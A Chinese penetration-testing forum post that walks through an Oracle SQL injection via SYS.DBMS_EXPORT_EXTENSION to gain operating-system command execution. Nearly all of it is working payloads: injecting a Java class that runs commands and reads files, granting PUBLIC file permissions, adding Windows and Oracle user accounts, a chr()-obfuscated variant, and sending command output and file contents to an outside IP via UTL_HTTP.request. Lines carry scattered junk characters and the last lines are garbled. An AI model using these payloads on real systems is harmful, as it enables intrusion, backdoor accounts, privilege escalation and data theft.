找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
返回列表 发新帖
查看: 2707|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
  }' S3 X1 `: i7 Q$ {+ c( a* p. o5 Z' C1 R+ V; G( ]( i
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) ' D  `: p6 K/ S) l# j
的形式即可。(用" 'a'|| "是为了让语句返回true值) ! h. V- G. E9 J0 q& A& I/ ]% I/ E4 I
语句有点长,可能要用post提交。
4 I3 w9 ]% f1 b# [, h, _. {以下是各个步骤: " U' {* \' e. x0 K2 K+ B
1.创建包 : i/ C* _# a# K) N4 P( L4 P
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
& a1 Q6 h/ ~/ A" e9 T5 d" e/xxx.jsp?id=1 and '1'<>'a'||(   J( d3 I4 E/ Q  J1 K3 h0 g, m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ G4 t/ A3 G( o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
6 r  o3 ^. b$ {; y; c! @+ u, rnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}9 E4 q# p3 Q# e0 g9 ~( `2 {
}'''';END;'';END;--','SYS',0,'1',0) from dual
# d9 J7 o' N( N  ]* X4 o5 A& w* V)
, q! ^/ R& d+ S# b/ S------------------------ 4 A2 A0 M: U! P$ m3 u6 I
如果url有长度限制,可以把readFile()函数块去掉,即:
6 \4 ~* E3 W! o& F9 |8 p/xxx.jsp?id=1 and '1'<>'a'||(
9 ^0 [) |' P; b1 _7 C, Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' Y8 l+ l% L8 U
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
1 }; _! p; R' Z" g( l6 Dnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
6 K/ Q8 j7 N0 q4 S}'''';END;'';END;--','SYS',0,'1',0) from dual & _9 [. u. @; a8 g2 I4 e
)
! A1 w+ ^3 x* P/ x6 J3 ]& K4 n同时把后面步骤 提到的 对readFile()的处理语句去掉。 8 C( ~* X' x% _* ]
------------------------------ # I' H: V6 G7 z+ G' ?+ X- Y
2.赋Java权限 # I+ `0 v. R6 w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual( d% y1 k/ f2 t1 f/ A/ \# C
3.创建函数 + ^5 \" l9 l- U3 k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- l# ~2 r! z) ~' Screate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual. Z$ U0 X8 B( j2 `- i) B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ r" C/ @9 q* t* ?( y& n
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual: U/ ~9 g* e6 y; Q! F3 F4 k/ i
4.赋public执行函数的权限 9 V) e7 D% B, R& o* g0 f0 ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual! u5 t9 \5 B. r* E$ \& t3 C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual( z' ?% [# l5 l+ H2 `
5.测试上面的几步是否成功
9 |' N5 Y( C/ n3 C' P& k5 C  rand '1'<>'11'||(
% O# L4 z) V8 ~4 v6 Lselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'   {( v9 X5 I5 F+ d2 d
) 6 w+ K. k; o" A  H- j) Y
and '1'<>(
! u" O0 j, s6 Q' s, T# hselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
- w& D# c9 ~0 _  \) ) X& P3 k7 s/ X: Q/ {
6.执行命令:
! V( K3 t. z4 F- k6 B/xxx.jsp?id=1 and '1'<>(
4 F% K, L5 @3 y2 Z1 W! K8 z. l6 ]select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
  p! d# [/ G1 W8 x: m, m- `4 Y$ e* s' l9 L7 N3 h
) 6 I& ]( i0 S' ~* m8 F0 s" R
/xxx.jsp?id=1 and '1'<>( * A- ~2 [# f6 t  w/ g
select  sys.LinxReadFile('c:/boot.ini') from dual, G0 [& Y9 ~" E

% C: s: |* m* A( h: F1 I% ]% a. Q)
. `* }! X7 d, S# l& n! j* e  9 h6 ^/ [9 K" A  k
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 & ^+ L  h2 Y, k
如果要查看运行结果可以用 union :
: {  J. m# t3 e6 y/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
4 G! @) ?, X, a4 ~! O或者UTL_HTTP.request(:
! F0 p1 @3 F& B$ v/xxx.jsp?id=1 and '1'<>( . H' V6 y# f& x0 E( n2 u; Q& M
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual( E! o9 L5 Q6 }8 @0 I; A
) ) F- J+ p0 b* t7 c. B+ o, F3 x
/xxx.jsp?id=1 and '1'<>(
9 u! ?: k& @; g% }SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual: E) D6 `, o5 P3 A9 O/ S
)
5 i0 X7 A, r0 t注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。% J( }  z: _. t4 {, [" |
-------------------- % |. i- f' w9 V9 o/ e, @& N
6.内部变化
5 s" M; A- h6 ?9 x" Z2 {. J1 s* Y" I通过以下命令可以查看all_objects表达改变:
& t" V5 B. n; R$ o0 {  Lselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'3 R& U, i( b1 Y; B! @; X
7.删除我们创建的函数   w7 e/ w7 l  {- g  H+ o0 t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''6 S. X% ^3 h! i+ m( ^% y
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
9 ?, _7 ?$ }# L( J4 j- Y0 l====================================================
2 K9 f; M5 v7 n9 ^. `全文结束。谨以此文赠与我的朋友。 1 x* E# l9 e4 k5 I* z
linx ) E) {! O4 G' \- Z' L
124829445 # F" I3 O7 v) S) s- l/ m6 L3 l) P
2008.1.12
% ^" \  p7 @' c, c7 e9 N: U" K6 K0 zlinyujian@bjfu.edu.cn ) ~0 F' j. W# W9 h8 H7 {
====================================================================== 0 a- B$ F2 ~* I
测试漏洞的另一方法:
* y5 M: j1 y6 D  d; y创建oracle帐号: + I) B1 _1 z3 w+ u: G. @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 ~5 Y1 a. l6 w$ BCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual7 z$ ?9 _# o+ g
即:
# g# r: J8 d) ]' sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
% x3 h9 _$ J. D( \1 mchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
9 X! u8 T( k0 _& y  ~1 Y确定漏洞存在: ! ]" `: Z7 ^+ [# Z9 f# F
1<>(   t4 N- |, Z" p4 [6 y
select user_id from all_users where username='LINXSQL'
! s& O: X+ G; @+ ]' T$ c! }2 C7 o) w) & Y5 d. J7 c' ~. |2 h3 D
给linxsql连接权限: # T* d3 O* H2 ]3 f5 n" R1 g* W8 v, H4 f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 {" D/ i8 w& U2 kGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
; V* \3 }2 B* K2 x/ r3 Y, C, {删除帐号: 0 G/ t0 J- t) `' Y) m2 b6 C1 a
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 S  M- m* h0 e, N+ L9 s# Xdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 0 e- M# r" c1 [5 H
====================== 2 F, C8 [. a! G
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
# K' b  C2 l1 N( c9 y1.jsp?id=1 and '1'<>( . m9 W. y$ H! n$ j' f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ V# Y, m+ z$ c. r' bcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual* Z: }  L0 W* ]0 K- B. H
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE4 `; i, }1 I( ?2 Q
 )9 ]8 P& X1 o1 s* W) I

; c# M' M& x4 ^4 ^- n* n! n5 t9 V5 w# r" V. }
, B0 B! j& g0 D4 c% b, Z  K
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表